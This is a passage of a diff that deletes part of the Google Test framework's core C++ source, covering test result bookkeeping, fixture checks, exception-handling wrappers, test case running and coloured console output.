-  const size_t suffix_len = suffix.length();
-  return (str_len >= suffix_len) &&
-         CaseInsensitiveCStringEquals(str.c_str() + str_len - suffix_len,
-                                      suffix.c_str());
-}
-
-// Formats an int value as "%02d".
-std::string String::FormatIntWidth2(int value) {
-  std::stringstream ss;
-  ss << std::setfill('0') << std::setw(2) << value;
-  return ss.str();
-}
-
-// Formats an int value as "%X".
-std::string String::FormatHexInt(int value) {
-  std::stringstream ss;
-  ss << std::hex << std::uppercase << value;
-  return ss.str();
-}
-
-// Formats a byte as "%02X".
-std::string String::FormatByte(unsigned char value) {
-  std::stringstream ss;
-  ss << std::setfill('0') << std::setw(2) << std::hex << std::uppercase
-     << static_cast<unsigned int>(value);
-  return ss.str();
-}
-
-// Converts the buffer in a stringstream to an std::string, converting NUL
-// bytes to "\\0" along the way.
-std::string StringStreamToString(::std::stringstream* ss) {
-  const ::std::string& str = ss->str();
-  const char* const start = str.c_str();
-  const char* const end = start + str.length();
-
-  std::string result;
-  result.reserve(2 * (end - start));
-  for (const char* ch = start; ch != end; ++ch) {
-    if (*ch == '\0') {
-      result += "\\0";  // Replaces NUL with "\\0";
-    } else {
-      result += *ch;
-    }
-  }
-
-  return result;
-}
-
-// Appends the user-supplied message to the Google-Test-generated message.
-std::string AppendUserMessage(const std::string& gtest_msg,
-                              const Message& user_msg) {
-  // Appends the user message if it's non-empty.
-  const std::string user_msg_string = user_msg.GetString();
-  if (user_msg_string.empty()) {
-    return gtest_msg;
-  }
-
-  return gtest_msg + "\n" + user_msg_string;
-}
-
-}  // namespace internal
-
-// class TestResult
-
-// Creates an empty TestResult.
-TestResult::TestResult()
-    : death_test_count_(0),
-      elapsed_time_(0) {
-}
-
-// D'tor.
-TestResult::~TestResult() {
-}
-
-// Returns the i-th test part result among all the results. i can
-// range from 0 to total_part_count() - 1. If i is not in that range,
-// aborts the program.
-const TestPartResult& TestResult::GetTestPartResult(int i) const {
-  if (i < 0 || i >= total_part_count())
-    internal::posix::Abort();
-  return test_part_results_.at(i);
-}
-
-// Returns the i-th test property. i can range from 0 to
-// test_property_count() - 1. If i is not in that range, aborts the
-// program.
-const TestProperty& TestResult::GetTestProperty(int i) const {
-  if (i < 0 || i >= test_property_count())
-    internal::posix::Abort();
-  return test_properties_.at(i);
-}
-
-// Clears the test part results.
-void TestResult::ClearTestPartResults() {
-  test_part_results_.clear();
-}
-
-// Adds a test part result to the list.
-void TestResult::AddTestPartResult(const TestPartResult& test_part_result) {
-  test_part_results_.push_back(test_part_result);
-}
-
-// Adds a test property to the list. If a property with the same key as the
-// supplied property is already represented, the value of this test_property
-// replaces the old value for that key.
-void TestResult::RecordProperty(const std::string& xml_element,
-                                const TestProperty& test_property) {
-  if (!ValidateTestProperty(xml_element, test_property)) {
-    return;
-  }
-  internal::MutexLock lock(&test_properites_mutex_);
-  const std::vector<TestProperty>::iterator property_with_matching_key =
-      std::find_if(test_properties_.begin(), test_properties_.end(),
-                   internal::TestPropertyKeyIs(test_property.key()));
-  if (property_with_matching_key == test_properties_.end()) {
-    test_properties_.push_back(test_property);
-    return;
-  }
-  property_with_matching_key->SetValue(test_property.value());
-}
-
-// The list of reserved attributes used in the <testsuites> element of XML
-// output.
-static const char* const kReservedTestSuitesAttributes[] = {
-  "disabled",
-  "errors",
-  "failures",
-  "name",
-  "random_seed",
-  "tests",
-  "time",
-  "timestamp"
-};
-
-// The list of reserved attributes used in the <testsuite> element of XML
-// output.
-static const char* const kReservedTestSuiteAttributes[] = {
-  "disabled",
-  "errors",
-  "failures",
-  "name",
-  "tests",
-  "time"
-};
-
-// The list of reserved attributes used in the <testcase> element of XML output.
-static const char* const kReservedTestCaseAttributes[] = {
-  "classname",
-  "name",
-  "status",
-  "time",
-  "type_param",
-  "value_param"
-};
-
-template <int kSize>
-std::vector<std::string> ArrayAsVector(const char* const (&array)[kSize]) {
-  return std::vector<std::string>(array, array + kSize);
-}
-
-static std::vector<std::string> GetReservedAttributesForElement(
-    const std::string& xml_element) {
-  if (xml_element == "testsuites") {
-    return ArrayAsVector(kReservedTestSuitesAttributes);
-  } else if (xml_element == "testsuite") {
-    return ArrayAsVector(kReservedTestSuiteAttributes);
-  } else if (xml_element == "testcase") {
-    return ArrayAsVector(kReservedTestCaseAttributes);
-  } else {
-    GTEST_CHECK_(false) << "Unrecognized xml_element provided: " << xml_element;
-  }
-  // This code is unreachable but some compilers may not realizes that.
-  return std::vector<std::string>();
-}
-
-static std::string FormatWordList(const std::vector<std::string>& words) {
-  Message word_list;
-  for (size_t i = 0; i < words.size(); ++i) {
-    if (i > 0 && words.size() > 2) {
-      word_list << ", ";
-    }
-    if (i == words.size() - 1) {
-      word_list << "and ";
-    }
-    word_list << "'" << words[i] << "'";
-  }
-  return word_list.GetString();
-}
-
-bool ValidateTestPropertyName(const std::string& property_name,
-                              const std::vector<std::string>& reserved_names) {
-  if (std::find(reserved_names.begin(), reserved_names.end(), property_name) !=
-          reserved_names.end()) {
-    ADD_FAILURE() << "Reserved key used in RecordProperty(): " << property_name
-                  << " (" << FormatWordList(reserved_names)
-                  << " are reserved by " << GTEST_NAME_ << ")";
-    return false;
-  }
-  return true;
-}
-
-// Adds a failure if the key is a reserved attribute of the element named
-// xml_element.  Returns true if the property is valid.
-bool TestResult::ValidateTestProperty(const std::string& xml_element,
-                                      const TestProperty& test_property) {
-  return ValidateTestPropertyName(test_property.key(),
-                                  GetReservedAttributesForElement(xml_element));
-}
-
-// Clears the object.
-void TestResult::Clear() {
-  test_part_results_.clear();
-  test_properties_.clear();
-  death_test_count_ = 0;
-  elapsed_time_ = 0;
-}
-
-// Returns true iff the test failed.
-bool TestResult::Failed() const {
-  for (int i = 0; i < total_part_count(); ++i) {
-    if (GetTestPartResult(i).failed())
-      return true;
-  }
-  return false;
-}
-
-// Returns true iff the test part fatally failed.
-static bool TestPartFatallyFailed(const TestPartResult& result) {
-  return result.fatally_failed();
-}
-
-// Returns true iff the test fatally failed.
-bool TestResult::HasFatalFailure() const {
-  return CountIf(test_part_results_, TestPartFatallyFailed) > 0;
-}
-
-// Returns true iff the test part non-fatally failed.
-static bool TestPartNonfatallyFailed(const TestPartResult& result) {
-  return result.nonfatally_failed();
-}
-
-// Returns true iff the test has a non-fatal failure.
-bool TestResult::HasNonfatalFailure() const {
-  return CountIf(test_part_results_, TestPartNonfatallyFailed) > 0;
-}
-
-// Gets the number of all test parts.  This is the sum of the number
-// of successful test parts and the number of failed test parts.
-int TestResult::total_part_count() const {
-  return static_cast<int>(test_part_results_.size());
-}
-
-// Returns the number of the test properties.
-int TestResult::test_property_count() const {
-  return static_cast<int>(test_properties_.size());
-}
-
-// class Test
-
-// Creates a Test object.
-
-// The c'tor saves the values of all Google Test flags.
-Test::Test()
-    : gtest_flag_saver_(new internal::GTestFlagSaver) {
-}
-
-// The d'tor restores the values of all Google Test flags.
-Test::~Test() {
-  delete gtest_flag_saver_;
-}
-
-// Sets up the test fixture.
-//
-// A sub-class may override this.
-void Test::SetUp() {
-}
-
-// Tears down the test fixture.
-//
-// A sub-class may override this.
-void Test::TearDown() {
-}
-
-// Allows user supplied key value pairs to be recorded for later output.
-void Test::RecordProperty(const std::string& key, const std::string& value) {
-  UnitTest::GetInstance()->RecordProperty(key, value);
-}
-
-// Allows user supplied key value pairs to be recorded for later output.
-void Test::RecordProperty(const std::string& key, int value) {
-  Message value_message;
-  value_message << value;
-  RecordProperty(key, value_message.GetString().c_str());
-}
-
-namespace internal {
-
-void ReportFailureInUnknownLocation(TestPartResult::Type result_type,
-                                    const std::string& message) {
-  // This function is a friend of UnitTest and as such has access to
-  // AddTestPartResult.
-  UnitTest::GetInstance()->AddTestPartResult(
-      result_type,
-      NULL,  // No info about the source file where the exception occurred.
-      -1,    // We have no info on which line caused the exception.
-      message,
-      "");   // No stack trace, either.
-}
-
-}  // namespace internal
-
-// Google Test requires all tests in the same test case to use the same test
-// fixture class.  This function checks if the current test has the
-// same fixture class as the first test in the current test case.  If
-// yes, it returns true; otherwise it generates a Google Test failure and
-// returns false.
-bool Test::HasSameFixtureClass() {
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  const TestCase* const test_case = impl->current_test_case();
-
-  // Info about the first test in the current test case.
-  const TestInfo* const first_test_info = test_case->test_info_list()[0];
-  const internal::TypeId first_fixture_id = first_test_info->fixture_class_id_;
-  const char* const first_test_name = first_test_info->name();
-
-  // Info about the current test.
-  const TestInfo* const this_test_info = impl->current_test_info();
-  const internal::TypeId this_fixture_id = this_test_info->fixture_class_id_;
-  const char* const this_test_name = this_test_info->name();
-
-  if (this_fixture_id != first_fixture_id) {
-    // Is the first test defined using TEST?
-    const bool first_is_TEST = first_fixture_id == internal::GetTestTypeId();
-    // Is this test defined using TEST?
-    const bool this_is_TEST = this_fixture_id == internal::GetTestTypeId();
-
-    if (first_is_TEST || this_is_TEST) {
-      // Both TEST and TEST_F appear in same test case, which is incorrect.
-      // Tell the user how to fix this.
-
-      // Gets the name of the TEST and the name of the TEST_F.  Note
-      // that first_is_TEST and this_is_TEST cannot both be true, as
-      // the fixture IDs are different for the two tests.
-      const char* const TEST_name =
-          first_is_TEST ? first_test_name : this_test_name;
-      const char* const TEST_F_name =
-          first_is_TEST ? this_test_name : first_test_name;
-
-      ADD_FAILURE()
-          << "All tests in the same test case must use the same test fixture\n"
-          << "class, so mixing TEST_F and TEST in the same test case is\n"
-          << "illegal.  In test case " << this_test_info->test_case_name()
-          << ",\n"
-          << "test " << TEST_F_name << " is defined using TEST_F but\n"
-          << "test " << TEST_name << " is defined using TEST.  You probably\n"
-          << "want to change the TEST to TEST_F or move it to another test\n"
-          << "case.";
-    } else {
-      // Two fixture classes with the same name appear in two different
-      // namespaces, which is not allowed. Tell the user how to fix this.
-      ADD_FAILURE()
-          << "All tests in the same test case must use the same test fixture\n"
-          << "class.  However, in test case "
-          << this_test_info->test_case_name() << ",\n"
-          << "you defined test " << first_test_name
-          << " and test " << this_test_name << "\n"
-          << "using two different test fixture classes.  This can happen if\n"
-          << "the two classes are from different namespaces or translation\n"
-          << "units and have the same name.  You should probably rename one\n"
-          << "of the classes to put the tests into different test cases.";
-    }
-    return false;
-  }
-
-  return true;
-}
-
-#if GTEST_HAS_SEH
-
-// Adds an "exception thrown" fatal failure to the current test.  This
-// function returns its result via an output parameter pointer because VC++
-// prohibits creation of objects with destructors on stack in functions
-// using __try (see error C2712).
-static std::string* FormatSehExceptionMessage(DWORD exception_code,
-                                              const char* location) {
-  Message message;
-  message << "SEH exception with code 0x" << std::setbase(16) <<
-    exception_code << std::setbase(10) << " thrown in " << location << ".";
-
-  return new std::string(message.GetString());
-}
-
-#endif  // GTEST_HAS_SEH
-
-namespace internal {
-
-#if GTEST_HAS_EXCEPTIONS
-
-// Adds an "exception thrown" fatal failure to the current test.
-static std::string FormatCxxExceptionMessage(const char* description,
-                                             const char* location) {
-  Message message;
-  if (description != NULL) {
-    message << "C++ exception with description \"" << description << "\"";
-  } else {
-    message << "Unknown C++ exception";
-  }
-  message << " thrown in " << location << ".";
-
-  return message.GetString();
-}
-
-static std::string PrintTestPartResultToString(
-    const TestPartResult& test_part_result);
-
-GoogleTestFailureException::GoogleTestFailureException(
-    const TestPartResult& failure)
-    : ::std::runtime_error(PrintTestPartResultToString(failure).c_str()) {}
-
-#endif  // GTEST_HAS_EXCEPTIONS
-
-// We put these helper functions in the internal namespace as IBM's xlC
-// compiler rejects the code if they were declared static.
-
-// Runs the given method and handles SEH exceptions it throws, when
-// SEH is supported; returns the 0-value for type Result in case of an
-// SEH exception.  (Microsoft compilers cannot handle SEH and C++
-// exceptions in the same function.  Therefore, we provide a separate
-// wrapper function for handling SEH exceptions.)
-template <class T, typename Result>
-Result HandleSehExceptionsInMethodIfSupported(
-    T* object, Result (T::*method)(), const char* location) {
-#if GTEST_HAS_SEH
-  __try {
-    return (object->*method)();
-  } __except (internal::UnitTestOptions::GTestShouldProcessSEH(  // NOLINT
-      GetExceptionCode())) {
-    // We create the exception message on the heap because VC++ prohibits
-    // creation of objects with destructors on stack in functions using __try
-    // (see error C2712).
-    std::string* exception_message = FormatSehExceptionMessage(
-        GetExceptionCode(), location);
-    internal::ReportFailureInUnknownLocation(TestPartResult::kFatalFailure,
-                                             *exception_message);
-    delete exception_message;
-    return static_cast<Result>(0);
-  }
-#else
-  (void)location;
-  return (object->*method)();
-#endif  // GTEST_HAS_SEH
-}
-
-// Runs the given method and catches and reports C++ and/or SEH-style
-// exceptions, if they are supported; returns the 0-value for type
-// Result in case of an SEH exception.
-template <class T, typename Result>
-Result HandleExceptionsInMethodIfSupported(
-    T* object, Result (T::*method)(), const char* location) {
-  // NOTE: The user code can affect the way in which Google Test handles
-  // exceptions by setting GTEST_FLAG(catch_exceptions), but only before
-  // RUN_ALL_TESTS() starts. It is technically possible to check the flag
-  // after the exception is caught and either report or re-throw the
-  // exception based on the flag's value:
-  //
-  // try {
-  //   // Perform the test method.
-  // } catch (...) {
-  //   if (GTEST_FLAG(catch_exceptions))
-  //     // Report the exception as failure.
-  //   else
-  //     throw;  // Re-throws the original exception.
-  // }
-  //
-  // However, the purpose of this flag is to allow the program to drop into
-  // the debugger when the exception is thrown. On most platforms, once the
-  // control enters the catch block, the exception origin information is
-  // lost and the debugger will stop the program at the point of the
-  // re-throw in this function -- instead of at the point of the original
-  // throw statement in the code under test.  For this reason, we perform
-  // the check early, sacrificing the ability to affect Google Test's
-  // exception handling in the method where the exception is thrown.
-  if (internal::GetUnitTestImpl()->catch_exceptions()) {
-#if GTEST_HAS_EXCEPTIONS
-    try {
-      return HandleSehExceptionsInMethodIfSupported(object, method, location);
-    } catch (const internal::GoogleTestFailureException&) {  // NOLINT
-      // This exception type can only be thrown by a failed Google
-      // Test assertion with the intention of letting another testing
-      // framework catch it.  Therefore we just re-throw it.
-      throw;
-    } catch (const std::exception& e) {  // NOLINT
-      internal::ReportFailureInUnknownLocation(
-          TestPartResult::kFatalFailure,
-          FormatCxxExceptionMessage(e.what(), location));
-    } catch (...) {  // NOLINT
-      internal::ReportFailureInUnknownLocation(
-          TestPartResult::kFatalFailure,
-          FormatCxxExceptionMessage(NULL, location));
-    }
-    return static_cast<Result>(0);
-#else
-    return HandleSehExceptionsInMethodIfSupported(object, method, location);
-#endif  // GTEST_HAS_EXCEPTIONS
-  } else {
-    return (object->*method)();
-  }
-}
-
-}  // namespace internal
-
-// Runs the test and updates the test result.
-void Test::Run() {
-  if (!HasSameFixtureClass()) return;
-
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(this, &Test::SetUp, "SetUp()");
-  // We will run the test only if SetUp() was successful.
-  if (!HasFatalFailure()) {
-    impl->os_stack_trace_getter()->UponLeavingGTest();
-    internal::HandleExceptionsInMethodIfSupported(
-        this, &Test::TestBody, "the test body");
-  }
-
-  // However, we want to clean up as much as possible.  Hence we will
-  // always call TearDown(), even if SetUp() or the test body has
-  // failed.
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      this, &Test::TearDown, "TearDown()");
-}
-
-// Returns true iff the current test has a fatal failure.
-bool Test::HasFatalFailure() {
-  return internal::GetUnitTestImpl()->current_test_result()->HasFatalFailure();
-}
-
-// Returns true iff the current test has a non-fatal failure.
-bool Test::HasNonfatalFailure() {
-  return internal::GetUnitTestImpl()->current_test_result()->
-      HasNonfatalFailure();
-}
-
-// class TestInfo
-
-// Constructs a TestInfo object. It assumes ownership of the test factory
-// object.
-TestInfo::TestInfo(const std::string& a_test_case_name,
-                   const std::string& a_name,
-                   const char* a_type_param,
-                   const char* a_value_param,
-                   internal::TypeId fixture_class_id,
-                   internal::TestFactoryBase* factory)
-    : test_case_name_(a_test_case_name),
-      name_(a_name),
-      type_param_(a_type_param ? new std::string(a_type_param) : NULL),
-      value_param_(a_value_param ? new std::string(a_value_param) : NULL),
-      fixture_class_id_(fixture_class_id),
-      should_run_(false),
-      is_disabled_(false),
-      matches_filter_(false),
-      factory_(factory),
-      result_() {}
-
-// Destructs a TestInfo object.
-TestInfo::~TestInfo() { delete factory_; }
-
-namespace internal {
-
-// Creates a new TestInfo object and registers it with Google Test;
-// returns the created object.
-//
-// Arguments:
-//
-//   test_case_name:   name of the test case
-//   name:             name of the test
-//   type_param:       the name of the test's type parameter, or NULL if
-//                     this is not a typed or a type-parameterized test.
-//   value_param:      text representation of the test's value parameter,
-//                     or NULL if this is not a value-parameterized test.
-//   fixture_class_id: ID of the test fixture class
-//   set_up_tc:        pointer to the function that sets up the test case
-//   tear_down_tc:     pointer to the function that tears down the test case
-//   factory:          pointer to the factory that creates a test object.
-//                     The newly created TestInfo instance will assume
-//                     ownership of the factory object.
-TestInfo* MakeAndRegisterTestInfo(
-    const char* test_case_name,
-    const char* name,
-    const char* type_param,
-    const char* value_param,
-    TypeId fixture_class_id,
-    SetUpTestCaseFunc set_up_tc,
-    TearDownTestCaseFunc tear_down_tc,
-    TestFactoryBase* factory) {
-  TestInfo* const test_info =
-      new TestInfo(test_case_name, name, type_param, value_param,
-                   fixture_class_id, factory);
-  GetUnitTestImpl()->AddTestInfo(set_up_tc, tear_down_tc, test_info);
-  return test_info;
-}
-
-#if GTEST_HAS_PARAM_TEST
-void ReportInvalidTestCaseType(const char* test_case_name,
-                               const char* file, int line) {
-  Message errors;
-  errors
-      << "Attempted redefinition of test case " << test_case_name << ".\n"
-      << "All tests in the same test case must use the same test fixture\n"
-      << "class.  However, in test case " << test_case_name << ", you tried\n"
-      << "to define a test using a fixture class different from the one\n"
-      << "used earlier. This can happen if the two fixture classes are\n"
-      << "from different namespaces and have the same name. You should\n"
-      << "probably rename one of the classes to put the tests into different\n"
-      << "test cases.";
-
-  fprintf(stderr, "%s %s", FormatFileLocation(file, line).c_str(),
-          errors.GetString().c_str());
-}
-#endif  // GTEST_HAS_PARAM_TEST
-
-}  // namespace internal
-
-namespace {
-
-// A predicate that checks the test name of a TestInfo against a known
-// value.
-//
-// This is used for implementation of the TestCase class only.  We put
-// it in the anonymous namespace to prevent polluting the outer
-// namespace.
-//
-// TestNameIs is copyable.
-class TestNameIs {
- public:
-  // Constructor.
-  //
-  // TestNameIs has NO default constructor.
-  explicit TestNameIs(const char* name)
-      : name_(name) {}
-
-  // Returns true iff the test name of test_info matches name_.
-  bool operator()(const TestInfo * test_info) const {
-    return test_info && test_info->name() == name_;
-  }
-
- private:
-  std::string name_;
-};
-
-}  // namespace
-
-namespace internal {
-
-// This method expands all parameterized tests registered with macros TEST_P
-// and INSTANTIATE_TEST_CASE_P into regular tests and registers those.
-// This will be done just once during the program runtime.
-void UnitTestImpl::RegisterParameterizedTests() {
-#if GTEST_HAS_PARAM_TEST
-  if (!parameterized_tests_registered_) {
-    parameterized_test_registry_.RegisterTests();
-    parameterized_tests_registered_ = true;
-  }
-#endif
-}
-
-}  // namespace internal
-
-// Creates the test object, runs it, records its result, and then
-// deletes it.
-void TestInfo::Run() {
-  if (!should_run_) return;
-
-  // Tells UnitTest where to store test result.
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  impl->set_current_test_info(this);
-
-  TestEventListener* repeater = UnitTest::GetInstance()->listeners().repeater();
-
-  // Notifies the unit test event listeners that a test is about to start.
-  repeater->OnTestStart(*this);
-
-  const TimeInMillis start = internal::GetTimeInMillis();
-
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-
-  // Creates the test object.
-  Test* const test = internal::HandleExceptionsInMethodIfSupported(
-      factory_, &internal::TestFactoryBase::CreateTest,
-      "the test fixture's constructor");
-
-  // Runs the test only if the test object was created and its
-  // constructor didn't generate a fatal failure.
-  if ((test != NULL) && !Test::HasFatalFailure()) {
-    // This doesn't throw as all user code that can throw are wrapped into
-    // exception handling code.
-    test->Run();
-  }
-
-  // Deletes the test object.
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      test, &Test::DeleteSelf_, "the test fixture's destructor");
-
-  result_.set_elapsed_time(internal::GetTimeInMillis() - start);
-
-  // Notifies the unit test event listener that a test has just finished.
-  repeater->OnTestEnd(*this);
-
-  // Tells UnitTest to stop associating assertion results to this
-  // test.
-  impl->set_current_test_info(NULL);
-}
-
-// class TestCase
-
-// Gets the number of successful tests in this test case.
-int TestCase::successful_test_count() const {
-  return CountIf(test_info_list_, TestPassed);
-}
-
-// Gets the number of failed tests in this test case.
-int TestCase::failed_test_count() const {
-  return CountIf(test_info_list_, TestFailed);
-}
-
-// Gets the number of disabled tests that will be reported in the XML report.
-int TestCase::reportable_disabled_test_count() const {
-  return CountIf(test_info_list_, TestReportableDisabled);
-}
-
-// Gets the number of disabled tests in this test case.
-int TestCase::disabled_test_count() const {
-  return CountIf(test_info_list_, TestDisabled);
-}
-
-// Gets the number of tests to be printed in the XML report.
-int TestCase::reportable_test_count() const {
-  return CountIf(test_info_list_, TestReportable);
-}
-
-// Get the number of tests in this test case that should run.
-int TestCase::test_to_run_count() const {
-  return CountIf(test_info_list_, ShouldRunTest);
-}
-
-// Gets the number of all tests.
-int TestCase::total_test_count() const {
-  return static_cast<int>(test_info_list_.size());
-}
-
-// Creates a TestCase with the given name.
-//
-// Arguments:
-//
-//   name:         name of the test case
-//   a_type_param: the name of the test case's type parameter, or NULL if
-//                 this is not a typed or a type-parameterized test case.
-//   set_up_tc:    pointer to the function that sets up the test case
-//   tear_down_tc: pointer to the function that tears down the test case
-TestCase::TestCase(const char* a_name, const char* a_type_param,
-                   Test::SetUpTestCaseFunc set_up_tc,
-                   Test::TearDownTestCaseFunc tear_down_tc)
-    : name_(a_name),
-      type_param_(a_type_param ? new std::string(a_type_param) : NULL),
-      set_up_tc_(set_up_tc),
-      tear_down_tc_(tear_down_tc),
-      should_run_(false),
-      elapsed_time_(0) {
-}
-
-// Destructor of TestCase.
-TestCase::~TestCase() {
-  // Deletes every Test in the collection.
-  ForEach(test_info_list_, internal::Delete<TestInfo>);
-}
-
-// Returns the i-th test among all the tests. i can range from 0 to
-// total_test_count() - 1. If i is not in that range, returns NULL.
-const TestInfo* TestCase::GetTestInfo(int i) const {
-  const int index = GetElementOr(test_indices_, i, -1);
-  return index < 0 ? NULL : test_info_list_[index];
-}
-
-// Returns the i-th test among all the tests. i can range from 0 to
-// total_test_count() - 1. If i is not in that range, returns NULL.
-TestInfo* TestCase::GetMutableTestInfo(int i) {
-  const int index = GetElementOr(test_indices_, i, -1);
-  return index < 0 ? NULL : test_info_list_[index];
-}
-
-// Adds a test to this test case.  Will delete the test upon
-// destruction of the TestCase object.
-void TestCase::AddTestInfo(TestInfo * test_info) {
-  test_info_list_.push_back(test_info);
-  test_indices_.push_back(static_cast<int>(test_indices_.size()));
-}
-
-// Runs every test in this TestCase.
-void TestCase::Run() {
-  if (!should_run_) return;
-
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  impl->set_current_test_case(this);
-
-  TestEventListener* repeater = UnitTest::GetInstance()->listeners().repeater();
-
-  repeater->OnTestCaseStart(*this);
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      this, &TestCase::RunSetUpTestCase, "SetUpTestCase()");
-
-  const internal::TimeInMillis start = internal::GetTimeInMillis();
-  for (int i = 0; i < total_test_count(); i++) {
-    GetMutableTestInfo(i)->Run();
-  }
-  elapsed_time_ = internal::GetTimeInMillis() - start;
-
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      this, &TestCase::RunTearDownTestCase, "TearDownTestCase()");
-
-  repeater->OnTestCaseEnd(*this);
-  impl->set_current_test_case(NULL);
-}
-
-// Clears the results of all tests in this test case.
-void TestCase::ClearResult() {
-  ad_hoc_test_result_.Clear();
-  ForEach(test_info_list_, TestInfo::ClearTestResult);
-}
-
-// Shuffles the tests in this test case.
-void TestCase::ShuffleTests(internal::Random* random) {
-  Shuffle(random, &test_indices_);
-}
-
-// Restores the test order to before the first shuffle.
-void TestCase::UnshuffleTests() {
-  for (size_t i = 0; i < test_indices_.size(); i++) {
-    test_indices_[i] = static_cast<int>(i);
-  }
-}
-
-// Formats a countable noun.  Depending on its quantity, either the
-// singular form or the plural form is used. e.g.
-//
-// FormatCountableNoun(1, "formula", "formuli") returns "1 formula".
-// FormatCountableNoun(5, "book", "books") returns "5 books".
-static std::string FormatCountableNoun(int count,
-                                       const char * singular_form,
-                                       const char * plural_form) {
-  return internal::StreamableToString(count) + " " +
-      (count == 1 ? singular_form : plural_form);
-}
-
-// Formats the count of tests.
-static std::string FormatTestCount(int test_count) {
-  return FormatCountableNoun(test_count, "test", "tests");
-}
-
-// Formats the count of test cases.
-static std::string FormatTestCaseCount(int test_case_count) {
-  return FormatCountableNoun(test_case_count, "test case", "test cases");
-}
-
-// Converts a TestPartResult::Type enum to human-friendly string
-// representation.  Both kNonFatalFailure and kFatalFailure are translated
-// to "Failure", as the user usually doesn't care about the difference
-// between the two when viewing the test result.
-static const char * TestPartResultTypeToString(TestPartResult::Type type) {
-  switch (type) {
-    case TestPartResult::kSuccess:
-      return "Success";
-
-    case TestPartResult::kNonFatalFailure:
-    case TestPartResult::kFatalFailure:
-#ifdef _MSC_VER
-      return "error: ";
-#else
-      return "Failure\n";
-#endif
-    default:
-      return "Unknown result type";
-  }
-}
-
-namespace internal {
-
-// Prints a TestPartResult to an std::string.
-static std::string PrintTestPartResultToString(
-    const TestPartResult& test_part_result) {
-  return (Message()
-          << internal::FormatFileLocation(test_part_result.file_name(),
-                                          test_part_result.line_number())
-          << " " << TestPartResultTypeToString(test_part_result.type())
-          << test_part_result.message()).GetString();
-}
-
-// Prints a TestPartResult.
-static void PrintTestPartResult(const TestPartResult& test_part_result) {
-  const std::string& result =
-      PrintTestPartResultToString(test_part_result);
-  printf("%s\n", result.c_str());
-  fflush(stdout);
-  // If the test program runs in Visual Studio or a debugger, the
-  // following statements add the test part result message to the Output
-  // window such that the user can double-click on it to jump to the
-  // corresponding source code location; otherwise they do nothing.
-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE
-  // We don't call OutputDebugString*() on Windows Mobile, as printing
-  // to stdout is done by OutputDebugString() there already - we don't
-  // want the same message printed twice.
-  ::OutputDebugStringA(result.c_str());
-  ::OutputDebugStringA("\n");
-#endif
-}
-
-// class PrettyUnitTestResultPrinter
-
-enum GTestColor {
-  COLOR_DEFAULT,
-  COLOR_RED,
-  COLOR_GREEN,
-  COLOR_YELLOW
-};
-
-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE && \
-    !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-
-// Returns the character attribute for the given color.
-WORD GetColorAttribute(GTestColor color) {
-  switch (color) {
-    case COLOR_RED:    return FOREGROUND_RED;
-    case COLOR_GREEN:  return FOREGROUND_GREEN;
-    case COLOR_YELLOW: return FOREGROUND_RED | FOREGROUND_GREEN;
-    default:           return 0;
-  }
-}
-
-#else
-
-// Returns the ANSI color code for the given color.  COLOR_DEFAULT is
-// an invalid input.
-const char* GetAnsiColorCode(GTestColor color) {
-  switch (color) {
-    case COLOR_RED:     return "1";
-    case COLOR_GREEN:   return "2";
-    case COLOR_YELLOW:  return "3";
-    default:            return NULL;
-  };
-}
-
-#endif  // GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE
-
-// Returns true iff Google Test should use colors in the output.
-bool ShouldUseColor(bool stdout_is_tty) {
-  const char* const gtest_color = GTEST_FLAG(color).c_str();
-
-  if (String::CaseInsensitiveCStringEquals(gtest_color, "auto")) {
-#if GTEST_OS_WINDOWS
-    // On Windows the TERM variable is usually not set, but the
-    // console there does support colors.
-    return stdout_is_tty;
-#else
-    // On non-Windows platforms, we rely on the TERM variable.
-    const char* const term = posix::GetEnv("TERM");
-    const bool term_supports_color =
-        String::CStringEquals(term, "xterm") ||
-        String::CStringEquals(term, "xterm-color") ||
-        String::CStringEquals(term, "xterm-256color") ||
-        String::CStringEquals(term, "screen") ||
-        String::CStringEquals(term, "screen-256color") ||
-        String::CStringEquals(term, "linux") ||
-        String::CStringEquals(term, "cygwin");
-    return stdout_is_tty && term_supports_color;
-#endif  // GTEST_OS_WINDOWS
-  }
-
-  return String::CaseInsensitiveCStringEquals(gtest_color, "yes") ||
-      String::CaseInsensitiveCStringEquals(gtest_color, "true") ||
-      String::CaseInsensitiveCStringEquals(gtest_color, "t") ||
-      String::CStringEquals(gtest_color, "1");
-  // We take "yes", "true", "t", and "1" as meaning "yes".  If the
-  // value is neither one of these nor "auto", we treat it as "no" to
-  // be conservative.
-}
-
-// Helpers for printing colored strings to stdout. Note that on Windows, we
-// cannot simply emit special characters and have the terminal change colors.
-// This routine must actually emit the characters rather than return a string
-// that would be colored when printed, as can be done on Linux.
-void ColoredPrintf(GTestColor color, const char* fmt, ...) {
-  va_list args;
-  va_start(args, fmt);
-
-#if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_SYMBIAN || GTEST_OS_ZOS || \
-    GTEST_OS_IOS || GTEST_OS_WINDOWS_PHONE || GTEST_OS_WINDOWS_RT
-  const bool use_color = AlwaysFalse();
-#else
-  static const bool in_color_mode =
-      ShouldUseColor(posix::IsATTY(posix::FileNo(stdout)) != 0);
-  const bool use_color = in_color_mode && (color != COLOR_DEFAULT);
-#endif  // GTEST_OS_WINDOWS_MOBILE || GTEST_OS_SYMBIAN || GTEST_OS_ZOS
-  // The '!= 0' comparison is necessary to satisfy MSVC 7.1.
-
-  if (!use_color) {
-    vprintf(fmt, args);
-    va_end(args);
-    return;
-  }
-
